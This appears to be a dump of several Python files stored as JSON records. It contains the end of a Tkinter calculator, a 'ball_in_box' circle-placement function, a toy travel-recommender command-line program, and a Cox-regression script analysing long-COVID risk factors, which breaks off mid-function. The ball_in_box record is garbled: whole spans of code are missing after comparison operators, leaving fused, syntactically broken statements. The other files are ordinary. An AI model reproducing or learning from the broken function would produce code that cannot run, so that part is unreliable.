y=370)\r\nboton0 = Button(ventana, text=\"*\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"*\")).place(x=197, y=370)\r\nboton0 = Button(ventana, text=\"/\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"/\")).place(x=287, y=370)\r\nboton0 = Button(ventana, text=\"Raiz\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"sqrt\")).place(x=17, y=430)\r\nboton0 = Button(ventana, text=\"C\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=clear).place(x=107, y=430)\r\nboton0 = Button(ventana, text=\"EXP\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"**\")).place(x=197, y=430)\r\nboton0 = Button(ventana, text=\"=\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=operacion).place(x=287, y=430)\r\nboton0 = Button(ventana, text=\"(\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"(\")).place(x=17, y=490)\r\nboton0 = Button(ventana, text=\")\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\")\")).place(x=107, y=490)\r\nboton0 = Button(ventana, text=\"%\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"%\")).place(x=197, y=490)\r\nboton0 = Button(ventana, text=\"In\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"log\")).place(x=287, y=490)\r\n\r\nentrada = Entry(ventana, font=(\"arial\",20, \"bold\"),textvariable=entrada_texto, width=23, bd=5, insertwidth=5, bg=\"powder blue\", justify=\"right\").place(x=15,y=80)\r\n\r\ne1 = Label(ventana,text=\"FRANCISCO CASTILLO ITTJ\",font=(\"arial\",8,\"bold\"), width=54,height=2, bg=\"white\", fg=\"black\").place(x=5,y=560)\r\n\r\n\r\nventana.mainloop()\r\n \r\n \r\n \r\n","sub_path":"calculadora1.py","file_name":"calculadora1.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"518402617","text":"import math\nimport copy\ndef ball_in_box(m,blockers):\n x=[]\n y=[]\n circles=[]\n already=[]\n for blocker in blockers:\n if blocker[0] not in x:\n x.append(blocker[0])\n if blocker[1] not in y:\n y.append(blocker[1])\n x.append(-1)\n x.append(1)\n y.append(-1)\n y.append(1)\n x.sort()\n y.sort()\n for j in range(len(y)-1):\n for i in range(len(x)-1):\n running=True\n for box in already:\n if box[0][0]<=x[i] and x[i](lim[-1][1]-lim[0][1]):\n for j0 in range(len(y)):\n if y[j0]>lim[-1][1]:\n add=True\n lim[-1]=(lim[-1][0],y[j0])\n c1=((lim[0][0]+lim[-1][0])/2.0,(lim[0][1]+lim[-1][1])/2.0,min(lim[-1][0]-lim[0][0],lim[-1][1]-lim[0][1])/2.0)\n for blocker in blockers:\n if (blocker[0]-c1[0])**2+(blocker[1]-c1[1])**2lim[-1][0]:\n add=True\n lim[-1]=(x[i0],lim[-1][1])\n c1=((lim[0][0]+lim[-1][0])/2.0,(lim[0][1]+lim[-1][1])/2.0,min(lim[-1][0]-lim[0][0],lim[-1][1]-lim[0][1])/2.0)\n for blocker in blockers:\n if (blocker[0]-c1[0])**2+(blocker[1]-c1[1])**2biggest[2]:\n biggestindex=k\n biggest=circles[k]\n circles0.append(circles[biggestindex])\n del circles[biggestindex]\n return circles0","sub_path":"ballinbox.py","file_name":"ballinbox.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"448814139","text":"# Synopsis from Wikipedia.\nLOCATIONS = {\n \"Seattle\": {\n \"attributes\": [\n \"WINTER_SPORTS\",\n \"WATER_SPORTS\",\n \"HIKING\",\n \"SEAFOOD\",\n \"SPORTS\",\n ],\n \"synopsis\": \"Seattle is a seaport city on the west coast of the \"\n \"United States.\",\n \"budget\": 5000\n },\n \"Boston\": {\n \"attributes\": [\n \"SEAFOOD\",\n \"AMERICAN_HISTORY\",\n \"SPORTS\",\n ],\n \"synopsis\": \"Boston is the capital city and most populous \"\n \"municipality of the Commonwealth of Massachusetts \"\n \"in the United States.\",\n \"budget\": 700\n },\n \"Columbus\": {\n \"attributes\": [\n \"COLLEGE_TOWN\",\n \"SPORTS\",\n ],\n \"synopsis\": \"Columbus is the state capital and the most populous \"\n \"city of the U.S. state of Ohio.\",\n \"budget\": 200\n },\n \"Washington DC\": {\n \"attributes\": [\n \"AMERICAN_HISTORY\",\n \"MUSEUMS\",\n \"POLITICS\",\n ],\n \"synopsis\": \"Washington, D.C., the capital of the United States of \"\n \"America and the seat of its three branches of government, \"\n \"has an unparalleled collection of free, public museums, and \"\n \"the lion's share of the nation's most treasured monuments \"\n \"and memorials. The vistas on the National Mall between the \"\n \"Capitol, Washington Monument, White House, and Lincoln Memorial \"\n \"are iconic throughout the world.\",\n \"budget\": 2500\n },\n \"Cuba\": {\n \"attributes\": [\n \"SPANISH\",\n \"HISTORIC\",\n \"TROPICAL\",\n \"CIGARS\",\n \"RUM\",\n \"BEACHES\",\n ],\n \"synopsis\": \"Cuba is the largest Caribbean island, between the Caribbean Sea \"\n \"and the North Atlantic Ocean. It lies 145 km (90 miles) south of Key West, \"\n \"Florida, between the Cayman Islands and the Bahamas, to the west of Haiti, \"\n \"and northwest of Jamaica.\",\n \"budget\": 1000\n },\n}\n\n\ndef main():\n print(\"Welcome to JourneyBoiye\\n\")\n\n # Prompt for basic info.\n name = input(\"Name: \")\n salary = input(\"Salary: \")\n budget = 5000\n age = input(\"Age: \")\n zipCode = input(\"What's your zip-code? \")\n\n likes = input(\"Tell me about yourself and interests: \")\n print()\n\n print(\"Welcome {}!\".format(name))\n print()\n\n print(\"Now, I'm going to ask you where you've been before and what you thought of these places\")\n another = \"\"\n while another != \"NO\":\n loc = input(\"Location: \")\n rating = input(\"Rating (1-5): \")\n comments = input(\"Comments: \")\n another = input(\"Another (NO to quit)? \")\n print()\n\n\n print(\"Now enter some commands!\")\n print()\n\n cmd = \"\"\n while cmd != \"QUIT\":\n cmd = input(\"> \").upper()\n if \"HELP\" in cmd:\n print(\"Here's a list of commands:\")\n print(\"\\tFIND or SEARCH to look for new suggestions\")\n print(\"\\tBROWSE to show current suggestions\")\n print(\"\\tSALARY to adjust salary\")\n elif \"SALARY\" in cmd:\n budget = 1000\n elif \"BROWSE\" in cmd or \"SHOW\" in cmd:\n print(\"Recommendations\")\n print()\n suggestions = dict(filter(lambda x: x[1][\"budget\"] == budget, LOCATIONS.items()))\n\n for name, attrs in suggestions.items():\n print(name)\n print(attrs[\"synopsis\"])\n print()\n print(\"Recommended because\\n\")\n\n if budget == 5000:\n print(\"Seafood\")\n print(\"CSE Major\")\n print(\"Large Salary\\n\")\n\n print(\"Here's what Seattle has to offer\")\n for attr in attrs[\"attributes\"]:\n print(attr)\n\n elif budget == 1000:\n print(\"Spanish Culture\")\n print(\"Lower salary\\n\")\n\n print(\"Here's what Cuba has to offer\")\n for attr in attrs[\"attributes\"]:\n print(attr)\n\n print()\n response = input(\"Thoughts on the above? \")\n print(\"Thank you for your input\")\n\n elif \"FIND\" in cmd or \"SEARCH\" in cmd:\n suggestions = dict(filter(lambda x: \"AMERICAN_HISTORY\" in x[1][\"attributes\"], LOCATIONS.items()))\n print(\"Results\")\n print()\n\n for name, attrs in suggestions.items():\n print(\"Here's what {} has to offer\".format(name))\n print(attrs[\"synopsis\"])\n print()\n\n for attr in attrs[\"attributes\"]:\n print(attr)\n print()\n\n print()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"485035893","text":"import os\nimport sys\n\n# for linux env.\nsys.path.insert(0, '..')\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport time\nimport random\nimport pickle\nimport ast\nfrom sklearn.model_selection import KFold\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import roc_auc_score, confusion_matrix, precision_recall_fscore_support\nfrom tqdm import tqdm\nfrom datetime import datetime\nimport functools\nimport seaborn as sns\n\nprint = functools.partial(print, flush=True)\nfrom misc import utils\nfrom lifelines import KaplanMeierFitter, CoxPHFitter, AalenJohansenFitter\nfrom lifelines.statistics import survival_difference_at_fixed_point_in_time_test, proportional_hazard_test, logrank_test\nfrom lifelines.plotting import add_at_risk_counts\nfrom lifelines.utils import k_fold_cross_validation\nfrom PRModels import ml\nimport matplotlib.pyplot as plt\nfrom brokenaxes import brokenaxes\n\n# from mlxtend.preprocessing import TransactionEncoder\n# from mlxtend.frequent_patterns import apriori\nKFOLD = 5\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='process parameters')\n # Input\n parser.add_argument('--dataset', choices=['OneFlorida', 'INSIGHT'], default='INSIGHT',\n help='data bases')\n parser.add_argument('--encode', choices=['elix', 'icd_med'], default='elix',\n help='data encoding')\n parser.add_argument('--population', choices=['positive', 'negative', 'all'], default='positive')\n parser.add_argument('--severity', choices=['all', 'outpatient', \"inpatienticu\",\n 'inpatient', 'icu', 'ventilation', ],\n default='inpatienticu')\n parser.add_argument('--goal', choices=['anypasc', 'allpasc', 'anyorgan', 'allorgan'], default='allpasc')\n parser.add_argument(\"--random_seed\", type=int, default=0)\n\n args = parser.parse_args()\n\n # More args\n if args.dataset == 'INSIGHT':\n args.data_file = r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL-PosOnly.csv'\n # args.data_file = r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL.csv'\n # args.processed_data_file = r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL-anyPASC.csv'\n # args.processed_data_file = r'output/dataset/INSIGHT/df_cohorts_covid_4manuNegNoCovidV2_bool_all-PosOnly-elix.csv'\n args.processed_data_file = r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL-PosOnly-anyPASC.csv'\n\n elif args.dataset == 'OneFlorida':\n args.data_file = r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all-PosOnly.csv'\n # args.data_file = r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all.csv'\n # args.processed_data_file = r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all-anyPASC.csv'\n # args.processed_data_file = r'output/dataset/OneFlorida/df_cohorts_covid_4manuNegNoCovidV2_bool_all-PosOnly-elix.csv'\n args.processed_data_file = r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all-PosOnly-anyPASC.csv'\n else:\n raise ValueError\n\n args.data_dir = r'output/dataset/{}/{}/'.format(args.dataset, args.encode)\n args.out_dir = r'output/factors/{}/{}/'.format(args.dataset, args.encode)\n args.fig_out_dir = r'output/figures/{}/{}/'.format(args.dataset, args.encode)\n\n # args.processed_data_file = r'output/dataset/{}/df_cohorts_covid_4manuNegNoCovidV2_bool_all-PosOnly-{}.csv'.format(\n # args.dataset, args.encode)\n\n if args.random_seed < 0:\n from datetime import datetime\n args.random_seed = int(datetime.now())\n\n # args.save_model_filename = os.path.join(args.output_dir, '_S{}{}'.format(args.random_seed, args.run_model))\n # utils.check_and_mkdir(args.out_dir)\n return args\n\n\ndef read_all_and_dump_covid_positive(data_file):\n # r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL.csv'\n # r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all.csv'\n print('Load data file:', data_file)\n # a_debug = pd.DataFrame({'0':df.columns, '1':df.dtypes})\n df = pd.read_csv(data_file, dtype={'patid': str, 'site': str, 'zip': str}, parse_dates=['index date'])\n df = df.loc[(df['covid'] == 1), :]\n print('df.loc[(df[covid] == 1), :].shape:', df.shape)\n\n df.to_csv(data_file.replace('.csv', '-PosOnly.csv'), index=False)\n print('Dump posOnly file done!:', data_file.replace('.csv', '-PosOnly.csv'))\n return df\n\n\ndef build_incident_pasc_from_all_positive(args, dump=True):\n start_time = time.time()\n print('In build_data_from_all_positive')\n print('Step1: Load Covid positive data file:', args.data_file)\n df = pd.read_csv(args.data_file, dtype={'patid': str, 'site': str, 'zip': str}, parse_dates=['index date'])\n # df = df.drop(columns=['Unnamed: 0.1'])\n # df = df.loc[(df['covid'] == 1), :]\n # df.to_csv(args.data_file.replace('.csv', '-PosOnly.csv'))\n print('df.shape:', df.shape)\n print('Covid Positives:', (df['covid'] == 1).sum(), (df['covid'] == 1).mean())\n print('Covid Negative:', (df['covid'] == 0).sum(), (df['covid'] == 0).mean())\n\n # add number of comorbidity as features\n n_comor = df[[x for x in df.columns if (x.startswith('DX:') or x.startswith('MEDICATION:'))]].sum(axis=1)\n n_comor_cols = ['num_Comorbidity=0', 'num_Comorbidity=1', 'num_Comorbidity=2',\n 'num_Comorbidity=3', 'num_Comorbidity=4', 'num_Comorbidity>=5']\n print('len(n_comor > 0)', (n_comor > 0).sum())\n for i in [0, 1, 2, 3, 4, 5]:\n col = n_comor_cols[i]\n print(i, col)\n df[col] = 0\n if i < 5:\n df.loc[n_comor == i, col] = 1\n else:\n df.loc[n_comor >= 5, col] = 1\n print('After add number of comorbidities df.shape:', df.shape)\n\n # add selected incident PASC flag\n print('Step2: add selected incident PASC flag and time 2 event')\n df_pasc_info = pd.read_excel('output/causal_effects_specific_withMedication_v3.xlsx', sheet_name='diagnosis')\n selected_pasc_list = df_pasc_info.loc[df_pasc_info['selected'] == 1, 'pasc']\n print('len(selected_pasc_list)', len(selected_pasc_list))\n print(selected_pasc_list)\n\n selected_organ_list = df_pasc_info.loc[df_pasc_info['selected'] == 1, 'Organ Domain'].unique()\n print('len(selected_organ_list)', len(selected_organ_list))\n print(selected_organ_list)\n organ_pasc = {}\n for i, organ in enumerate(selected_organ_list):\n pascs = df_pasc_info.loc[\n (df_pasc_info['selected'] == 1) & (df_pasc_info['Organ Domain'] == organ), 'pasc'].tolist()\n organ_pasc[organ] = pascs\n print(i, organ, '-->', len(pascs), ':', pascs)\n\n print('selected PASC and organ domain done!')\n\n exclude_DX_list = {\n 'Neurocognitive disorders': ['DX: Dementia'],\n 'Diabetes mellitus with complication': ['DX: Diabetes Type 2'],\n 'Chronic obstructive pulmonary disease and bronchiectasis': ['DX: Chronic Pulmonary Disorders', 'DX: COPD'],\n 'Circulatory signs and symptoms': ['DX: Arrythmia'],\n 'Anemia': ['DX: Anemia'],\n 'Heart failure': [\"DX: Congestive Heart Failure\"]\n }\n\n print('Labeling INCIDENT pasc in {0,1}')\n # flag@pascname for incidence label, dx-t2e@pascname for original shared t2e\n for pasc in selected_pasc_list:\n flag = df['dx-out@' + pasc] - df['dx-base@' + pasc]\n if pasc in exclude_DX_list:\n ex_DX_list = exclude_DX_list[pasc]\n print(pasc, 'further exclude', ex_DX_list)\n for ex_DX in ex_DX_list:\n flag -= df[ex_DX]\n\n df['flag@' + pasc] = (flag > 0).astype('int')\n\n def _debug_person(pid):\n _person = pd.DataFrame(data={'dx-base': df.loc[pid, ['dx-base@' + x for x in selected_pasc_list]].tolist(),\n 'dx-out': df.loc[pid, ['dx-out@' + x for x in selected_pasc_list]].tolist(),\n 'dx-t2e': df.loc[pid, ['dx-t2e@' + x for x in selected_pasc_list]].tolist()},\n index=selected_pasc_list)\n return _person\n\n # build flag, t2e for any pasc\n # flag@pascname for incidence label, dx-t2e@pascname for t2e which is shared from original data\n print('Any PASC: build flag, t2e for any pasc')\n specific_pasc_col = [x for x in df.columns if x.startswith('flag@')]\n n_pasc_series = df[specific_pasc_col].sum(axis=1)\n df['pasc-count'] = n_pasc_series # number of incident pascs of this person\n df['pasc-flag'] = (n_pasc_series > 0).astype('int') # indicator of any incident pasc of this person\n df['pasc-min-t2e'] = 180\n\n for index, rows in tqdm(df.iterrows(), total=df.shape[0]):\n npasc = rows['pasc-count']\n if npasc >= 1:\n # if there are any incident pasc, t2e of any pasc is the earliest time of incident pasc\n pasc_flag_cols = list(rows[specific_pasc_col][rows[specific_pasc_col] > 0].index)\n pasc_t2e_cols = [x.replace('flag@', 'dx-t2e@') for x in pasc_flag_cols]\n t2e = rows.loc[pasc_t2e_cols].min()\n else:\n # if no incident pasc, t2e of any pasc: event, death, censoring, 180 days followup, whichever came first.\n # no event, only consider death, censoring, 180 days,\n # 1. approximated by the maximum-t2e of any selected pasc .\n # unless all selected pasc happened, but not incident, this not happened in our data.\n # 2. directly follow the definition. Because I also stored max-followup information\n # t2e = rows.loc[['dx-t2e@' + x for x in selected_pasc_list]].max()\n t2e = max(30, np.min([rows['death t2e'], rows['maxfollowup'], 180]))\n\n df.loc[index, 'pasc-min-t2e'] = t2e\n\n # build flag, t2e for each organ\n print('Organ category: build flag, t2e for Organ category with a list of pascs')\n for organ in selected_organ_list:\n pascs = organ_pasc[organ]\n pascs_col = ['flag@' + x for x in pascs]\n organ_series = df[pascs_col].sum(axis=1)\n df['organ-count@' + organ] = organ_series\n df['organ-flag@' + organ] = (organ_series > 0).astype('int')\n df['organ-t2e@' + organ] = 180\n\n for index, rows in tqdm(df.iterrows(), total=df.shape[0]):\n for organ in selected_organ_list:\n npasc = rows['organ-count@' + organ]\n pascs_col = ['flag@' + x for x in organ_pasc[organ]]\n if npasc >= 1:\n pasc_flag_cols = list(rows[pascs_col][rows[pascs_col] > 0].index)\n pasc_t2e_cols = [x.replace('flag@', 'dx-t2e@') for x in pasc_flag_cols]\n t2e = rows.loc[pasc_t2e_cols].min()\n else:\n # t2e = rows.loc[['dx-t2e@' + x for x in organ_pasc[organ]]].max()\n t2e = max(30, np.min([rows['death t2e'], rows['maxfollowup'], 180]))\n\n df.loc[index, 'organ-t2e@' + organ] = t2e\n\n print('Any Organ: build flag, t2e for any organ')\n specific_organ_col = [x for x in df.columns if x.startswith('organ-flag@')]\n n_organ_series = df[specific_organ_col].sum(axis=1)\n df['organ-count'] = n_organ_series\n df['organ-flag'] = (n_organ_series > 0).astype('int')\n df['organ-min-t2e'] = 180\n # b_debug = df[['pasc-count', 'pasc-flag', 'pasc-min-t2e', 'organ-count', 'organ-flag', 'organ-min-t2e']]\n for index, rows in tqdm(df.iterrows(), total=df.shape[0]):\n norgan = rows['organ-count']\n if norgan >= 1:\n organ_flag_cols = list(rows[specific_organ_col][rows[specific_organ_col] > 0].index)\n organ_t2e_cols = [x.replace('organ-flag@', 'organ-t2e@') for x in organ_flag_cols]\n t2e = rows.loc[organ_t2e_cols].min()\n else:\n # t2e: event, death, censoring , 180, whichever came first.\n # no t2e, only consider death and censoring, which were considered by the maximum-t2e of any selected pasc\n # t2e = rows.loc[['organ-t2e@' + x for x in selected_organ_list]].max()\n t2e = max(30, np.min([rows['death t2e'], rows['maxfollowup'], 180]))\n\n df.loc[index, 'organ-min-t2e'] = t2e\n\n print('Add selected incident PASC, any pasc, organ system, flag done!')\n\n if dump:\n utils.check_and_mkdir(args.processed_data_file)\n df.to_csv(args.processed_data_file, index=False)\n print('Dump to:', args.processed_data_file)\n\n print('build_data_from_all_positive Done! Total Time used:',\n time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time)))\n\n return df, df_pasc_info\n\n\ndef distribution_statistics(args, df, df_pasc_info):\n print(\"df.shape\", df.shape)\n specific_pasc_col = [x for x in df.columns if x.startswith('flag@')]\n # pasc_person_counts = df[specific_pasc_col].sum().reset_index().rename(columns={'index': \"pasc\", 0: \"count\"})\n pasc_person_counts = pd.DataFrame({'count': df[specific_pasc_col].sum(),\n 'mean': df[specific_pasc_col].mean(),\n 'per1k': df[specific_pasc_col].mean() * 1000}).reset_index().rename(\n columns={'index': \"pasc\"})\n\n pasc_person_counts['pasc'] = pasc_person_counts['pasc'].apply(lambda x: x.split(\"@\")[-1])\n df_selected_pasc = df_pasc_info.loc[df_pasc_info['selected'] == 1, :]\n df_pasc_person_counts = pd.merge(pasc_person_counts,\n df_selected_pasc[['i', 'pasc', 'PASC Name Simple', 'Notes',\n 'selected', 'Organ Domain', 'Original CCSR Domain']],\n left_on='pasc', right_on='pasc', how='left')\n\n out_dir = r'output/dataset/{}/stats/'.format(args.dataset)\n utils.check_and_mkdir(out_dir)\n df_pasc_person_counts.to_csv(out_dir + 'pasc_person_counts_{}.csv'.format(args.dataset))\n df_person_pasc_counts = df['pasc-count'].rename(\"count\")\n df_person_pasc_counts.to_csv(out_dir + 'person_pasc_counts_{}.csv'.format(args.dataset))\n return df_pasc_person_counts, df_person_pasc_counts\n\n\ndef collect_feature_columns_4_risk_analysis(args, df):\n col_names = []\n if args.severity == 'all':\n # col_names += ['hospitalized', 'ventilation', 'criticalcare']\n col_names += ['not hospitalized', 'hospitalized', 'icu']\n\n # col_names += ['20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75-<85 years', '85+ years']\n col_names += ['20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years']\n\n # col_names += ['Female', 'Male', 'Other/Missing']\n col_names += ['Female', 'Male']\n\n # col_names += ['Asian', 'Black or African American', 'White', 'Other', 'Missing']\n col_names += ['Asian', 'Black or African American', 'White', 'Other']\n\n # col_names += ['Hispanic: Yes', 'Hispanic: No', 'Hispanic: Other/Missing']\n col_names += ['Hispanic: Yes', 'Hispanic: No', 'Hispanic: Other/Missing']\n\n # col_names += ['inpatient visits 0', 'inpatient visits 1-2', 'inpatient visits 3-4', 'inpatient visits >=5',\n # 'outpatient visits 0', 'outpatient visits 1-2', 'outpatient visits 3-4', 'outpatient visits >=5',\n # 'emergency visits 0', 'emergency visits 1-2', 'emergency visits 3-4', 'emergency visits >=5']\n col_names += ['inpatient visits 0', 'inpatient visits 1-4', 'inpatient visits >=5',\n 'emergency visits 0', 'emergency visits 1-4', 'emergency visits >=5']\n\n # col_names += ['ADI1-9', 'ADI10-19', 'ADI20-29', 'ADI30-39', 'ADI40-49', 'ADI50-59', 'ADI60-69', 'ADI70-79',\n # 'ADI80-89', 'ADI90-100']\n col_names += ['ADI1-19', 'ADI20-39', 'ADI40-59', 'ADI60-79', 'ADI80-100']\n\n col_names += ['BMI: <18.5 under weight', 'BMI: 18.5-<25 normal weight', 'BMI: 25-<30 overweight ',\n 'BMI: >=30 obese ', 'BMI: missing']\n\n col_names += ['Smoker: never', 'Smoker: current', 'Smoker: former', 'Smoker: missing']\n\n col_names += ['03/20-06/20', '07/20-10/20', '11/20-02/21', '03/21-06/21', '07/21-11/21']\n\n col_names += ['num_Comorbidity=0', 'num_Comorbidity=1', 'num_Comorbidity=2', 'num_Comorbidity=3',\n 'num_Comorbidity=4', 'num_Comorbidity>=5']\n\n if args.encode == 'icd_med':\n col_names += list(df.columns)[df.columns.get_loc('death t2e') + 1:df.columns.get_loc('label')]\n else:\n col_names += [\"DX: Alcohol Abuse\", \"DX: Anemia\", \"DX: Arrythmia\", \"DX: Asthma\", \"DX: Cancer\",\n \"DX: Chronic Kidney Disease\", \"DX: Chronic Pulmonary Disorders\", \"DX: Cirrhosis\",\n \"DX: Coagulopathy\", \"DX: Congestive Heart Failure\",\n \"DX: COPD\", \"DX: Coronary Artery Disease\", \"DX: Dementia\", \"DX: Diabetes Type 1\",\n \"DX: Diabetes Type 2\", \"DX: End Stage Renal Disease on Dialysis\", \"DX: Hemiplegia\",\n \"DX: HIV\", \"DX: Hypertension\", \"DX: Hypertension and Type 1 or 2 Diabetes Diagnosis\",\n \"DX: Inflammatory Bowel Disorder\", \"DX: Lupus or Systemic Lupus Erythematosus\",\n \"DX: Mental Health Disorders\", \"DX: Multiple Sclerosis\", \"DX: Parkinson's Disease\",\n \"DX: Peripheral vascular disorders \", \"DX: Pregnant\",\n \"DX: Pulmonary Circulation Disorder (PULMCR_ELIX)\",\n \"DX: Rheumatoid Arthritis\", \"DX: Seizure/Epilepsy\",\n \"DX: Severe Obesity (BMI>=40 kg/m2)\", \"DX: Weight Loss\",\n \"DX: Down's Syndrome\", 'DX: Other Substance Abuse', 'DX: Cystic Fibrosis',\n 'DX: Autism', 'DX: Sickle Cell'\n ]\n\n col_names += [\"MEDICATION: Corticosteroids\", \"MEDICATION: Immunosuppressant drug\"]\n\n print('encoding:', args.encode, 'len(col_names):', len(col_names))\n print(col_names)\n return col_names\n\n\ndef pre_transform_feature(df):\n # col_names = ['ADI1-9', 'ADI10-19', 'ADI20-29', 'ADI30-39', 'ADI40-49', 'ADI50-59', 'ADI60-69', 'ADI70-79',\n # 'ADI80-89', 'ADI90-100']\n df['ADI1-19'] = (df['ADI1-9'] + df['ADI10-19'] >= 1).astype('int')\n df['ADI20-39'] = (df['ADI20-29'] + df['ADI30-39'] >= 1).astype('int')\n df['ADI40-59'] = (df['ADI40-49'] + df['ADI50-59'] >= 1).astype('int')\n df['ADI60-79'] = (df['ADI60-69'] + df['ADI70-79'] >= 1).astype('int')\n df['ADI80-100'] = (df['ADI80-89'] + df['ADI90-100'] >= 1).astype('int')\n\n df['75+ years'] = (df['75-<85 years'] + df['85+ years'] >= 1).astype('int')\n\n df['inpatient visits 1-4'] = (df['inpatient visits 1-2'] + df['inpatient visits 3-4'] >= 1).astype('int')\n df['outpatient visits 1-4'] = (df['outpatient visits 1-2'] + df['outpatient visits 3-4'] >= 1).astype('int')\n df['emergency visits 1-4'] = (df['emergency visits 1-2'] + df['emergency visits 3-4'] >= 1).astype('int')\n\n df['not hospitalized'] = 1 - df['hospitalized']\n df['icu'] = ((df['ventilation'] + df['criticalcare']) >= 1).astype('int')\n\n return df\n\n\ndef risk_factor_of_any_pasc(args, df, df_pasc_info, pasc_threshold=1, dump=True):\n print('in risk_factor_of_any_pasc, PASC is defined by >=', pasc_threshold)\n\n print('df.shape:', df.shape)\n df = pre_transform_feature(df)\n print('df.shape after pre_transform_feature:', df.shape)\n covs_columns = collect_feature_columns_4_risk_analysis(args, df)\n\n pasc_flag = (df['pasc-count'] >= pasc_threshold).astype('int')\n pasc_t2e = df['pasc-min-t2e'] # this time 2 event can only be used for >= 1 pasc. If >= 2, how to define t2e?\n print('pos:{} ({:.3%})'.format(pasc_flag.sum(), pasc_flag.mean()),\n 'neg:{} ({:.3%})'.format((1 - pasc_flag).sum(), (1 - pasc_flag).mean()))\n # 1 pasc --> the earliest; 2 pasc --> 2nd earliest, et.c\n if pasc_threshold >= 2:\n print('pasc thereshold >=', pasc_threshold, 't2e is defined as the ', pasc_threshold, 'th earliest events time')\n df['pasc-min-t2e'] = 180\n specific_pasc_col = [x for x in df.columns if x.startswith('flag@')]\n for index, rows in tqdm(df.iterrows(), total=df.shape[0]):\n npasc = rows['pasc-count']\n if npasc >= pasc_threshold:\n # if at least pasc_threshold pasc occur, t2e is the pasc_threshold^th earlist time\n pasc_flag_cols = list(rows[specific_pasc_col][rows[specific_pasc_col] > 0].index)\n pasc_t2e_cols = [x.replace('flag@', 'dx-t2e@') for x in pasc_flag_cols]\n # t2e = rows[pasc_t2e_cols].min()\n time_vec = sorted(rows[pasc_t2e_cols])\n t2e = time_vec[min(len(time_vec) - 1, pasc_threshold - 1)]\n else:\n # if events number < pasc_threshold occur, e.g. pasc_threshold=2, but only 1 event happened,\n # then 2-event pasc did not happen\n # t2e is the event, death, censoring, 180 days, whichever came first.\n # t2e = rows.loc[[x.replace('flag@', 'dx-t2e@') for x in specific_pasc_col]].max()\n t2e = max(30, np.min([rows['death t2e'], rows['maxfollowup'], 180]))\n\n df.loc[index, 'pasc-min-t2e'] = t2e\n\n # support >= 2,3,4... by updating pasc-min-t2e definition.\n # pasc_name = 'Heart failure'\n # pasc_flag = df['flag@'+pasc_name]\n # pasc_t2e = df['dx-t2e@'+pasc_name]\n\n cox_data = df.loc[:, covs_columns]\n print('cox_data.shape before number filter:', cox_data.shape)\n cox_data = cox_data.loc[:, cox_data.columns[(cox_data.mean() >= 0.001) & (cox_data.mean() < 1)]]\n print('cox_data.shape after number filter:', cox_data.shape)\n\n model = ml.CoxPrediction(random_seed=args.random_seed, ).cross_validation_fit(\n cox_data, pasc_t2e, pasc_flag, kfold=KFOLD, scoring_method=\"concordance_index\")\n # paras_grid={'l1_ratio': [0], 'penalizer': [0.1]}\n\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[], pre='uni-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years'], pre='age-')\n if args.severity == 'all':\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu'], pre='ageAcute-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu', 'Female', 'Male', ], pre='ageAcuteSex-')\n\n if dump:\n utils.check_and_mkdir(args.out_dir + 'any_pasc/')\n model.risk_results.reset_index().sort_values(by=['HR'], ascending=False).to_csv(\n args.out_dir + 'any_pasc/any-at-least-{}-pasc-riskFactor-{}-{}-{}.csv'.format(\n pasc_threshold, args.dataset, args.population, args.severity))\n model.results.sort_values(by=['E[fit]'], ascending=False).to_csv(\n args.out_dir + 'any_pasc/any-at-least-{}-pasc-modeSelection-{}-{}-{}.csv'.format(\n pasc_threshold, args.dataset, args.population, args.severity))\n\n return model\n\n\ndef risk_factor_of_any_organ(args, df, df_pasc_info, 